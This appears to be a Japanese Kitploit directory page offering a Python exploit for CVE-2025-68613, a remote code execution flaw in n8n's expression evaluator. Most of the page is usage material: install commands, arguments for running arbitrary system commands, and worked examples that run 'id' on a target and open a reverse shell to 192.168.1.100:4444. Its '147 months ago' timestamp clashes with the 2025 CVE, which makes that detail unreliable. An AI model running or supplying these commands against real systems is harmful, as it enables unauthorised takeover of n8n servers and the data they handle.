Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-68613-Python-Exploit — CVE-2025-68613 用の Python エクスプロイト。 | Kitploit
ツール/GitHubGitHub/johanneslks/cve-2025-68613-python-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHubjohanneslks/cve-2025-68613-python-exploit

CVE-2025-68613-Python-Exploit

CVE-2025-68613 用の Python エクスプロイト。

リポジトリを見る
147ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-68613: n8n ワークフロー式 RCE

n8n ワークフロー自動化プラットフォームにおける重大なリモートコード実行(RCE)脆弱性の概念的実証(PoC)エクスプロイト。


説明

この脆弱性は n8n の式評価システムに存在します。ユーザーが指定した式が適切にサンドボックス化されていないため、認証された攻撃者がホストシステム上で任意のコードを実行できる可能性があります。

CVE ID: CVE-2025-68613
脆弱性の種類: リモートコード実行(RCE)
コンポーネント: 式評価器


影響を受けるバージョン

  • n8n >= 0.211.0
  • n8n < 1.120.4
  • n8n < 1.121.1
  • n8n < 1.122.0

インストール

git clone https://github.com/JohannesLks/CVE-2025-68613-Python-Exploit.git
cd CVE-2025-68613-Python-Exploit
pip install -r requirements.txt

使用方法

構文

python3 n8n_exploit.py -t <TARGET> -u <USER> -p <PASSWORD> [OPTIONS]

引数

  • -t, --target : ターゲットURL(例:http://localhost:5678)
  • -u, --username : n8n アカウントのメールアドレス
  • -p, --password : n8n アカウントのパスワード
  • -c, --cmd : 実行するシステムコマンド
  • --reverse-shell : リバースシェルを起動する(形式:IP PORT)

例

脆弱性の確認 / コマンドの実行:

python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" -c "id"

リバースシェルの確立:

python3 n8n_exploit.py -t http://target:5678 -u [email protected] -p "P@ssword123" --reverse-shell 192.168.1.100 4444
ツールをダウンロード